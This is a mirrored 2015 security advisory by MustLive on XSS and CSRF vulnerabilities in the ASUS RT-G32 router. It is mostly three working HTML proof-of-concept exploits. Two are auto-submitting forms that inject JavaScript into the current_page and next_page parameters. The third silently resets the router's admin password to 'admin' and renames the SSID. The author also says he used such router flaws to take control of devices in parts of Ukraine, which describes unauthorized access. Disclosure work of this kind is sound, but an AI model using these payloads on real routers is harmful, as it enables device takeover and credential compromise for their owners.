Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
securityvulnsSecurityvulnsSECURITYVULNS:DOC:32578
HistoryOct 25, 2015 - 12:00 a.m.

XSS and CSRF vulnerabilities in ASUS RT-G32

2015-10-2500:00:00
vulners.com
37
JSON

Hello 3APA3A!

There are Cross-Site Scripting and Cross-Site Request Forgery vulnerabilities in ASUS Wireless Router RT-G32.

Affected products:

Vulnerable is the next model: ASUS RT-G32 with different versions of firmware. I checked in ASUS RT-G32 with firmware versions 2.0.2.6 and 2.0.3.2.

Since Asus ignored vulnerabilities in their notebook, which I sent them in 2009, and previous vulnerabilities in RT-G32, which I sent them this year, so I publish these vulnerabilities publicly.

Details:

Cross-Site Scripting (WASC-08):

ASUS RT-G32 XSS-2.html

<html>
<head>
<title>ASUS RT-G32 XSS exploit (C) 2015 MustLive</title>
</head>
<body onLoad="document.hack.submit()">
<form name="hack" action="http://site/start_apply.htm&quot; method="post">
<input type="hidden" name="current_page" value="javascript:alert(document.cookie)">
</form>
</body>
</html>

ASUS RT-G32 XSS-3.html

<html>
<head>
<title>ASUS RT-G32 XSS exploit (C) 2015 MustLive</title>
</head>
<body onLoad="document.hack.submit()">
<form name="hack" action="http://site/start_apply.htm&quot; method="post">
<input type="hidden" name="next_page" value="javascript:alert(document.cookie)">
</form>
</body>
</html>

Cross-Site Request Forgery (WASC-09):

CSRF vulnerability allows to change different settings of device. As I showed in this exploit (post-auth).

ASUS RT-G32 CSRF-2.html

<html>
<head>
<title>ASUS RT-G32 CSRF exploit (C) 2015 MustLive</title>
</head>
<body onLoad="document.hack.submit()">
<form name="hack" action="http://site/start_apply.htm&quot; method="post">
<input type="hidden" name="sid_list" value="LANHostConfig%3BGeneral%3B">
<input type="hidden" name="group_id" value="">
<input type="hidden" name="modified" value="0">
<input type="hidden" name="action_mode" value="+Apply+">
<input type="hidden" name="wl_ssid2" value="Hacked">
<input type="hidden" name="http_passwd" value="admin">
<input type="hidden" name="http_passwd2" value="admin">
<input type="hidden" name="v_password2" value="admin">
<input type="hidden" name="log_ipaddr" value="">
<input type="hidden" name="time_zone" value="MST-3MDT">
<input type="hidden" name="ntp_server0" value="pool.ntp.org">
</form>
</body>
</html>

I found this and other routers since summer to take control over terrorists in Crimea, Donetsk and Lugansks regions of Ukraine. Read about it in the list (http://lists.webappsec.org/pipermail/websecurity_lists.webappsec.org/2015-April/009090.html&#41;.

I mentioned about these vulnerabilities at my site (http://websecurity.com.ua/7671/&#41;.

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua

JSON